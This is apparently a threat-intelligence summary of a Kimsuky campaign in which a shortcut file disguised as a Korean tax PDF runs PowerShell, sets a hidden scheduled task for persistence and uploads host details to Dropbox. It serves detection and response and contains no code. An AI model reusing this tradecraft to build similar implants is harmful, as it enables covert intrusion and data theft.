Kimsuky is linked to a Windows LNK payload disguised as a Korean capital gains tax base report and payment calculation PDF. The shortcut launches PowerShell, decodes embedded script content, downloads a decoy PDF and additional Dropbox-hosted scripts, and registers a hidden scheduled task named ChromeUpdateTaskMachineKOR to rerun chrome.ps1 every 30 minutes. Follow-on PowerShell collects host information such as IP address, OS details, boot time, installed antivirus products, and running processes, then uploads the results to Dropbox using OAuth and the content upload API. The excerpt provides the LNK hashes, Dropbox URLs and API endpoints, local AppData and Temp file paths, and the scheduled-task name for detection and response.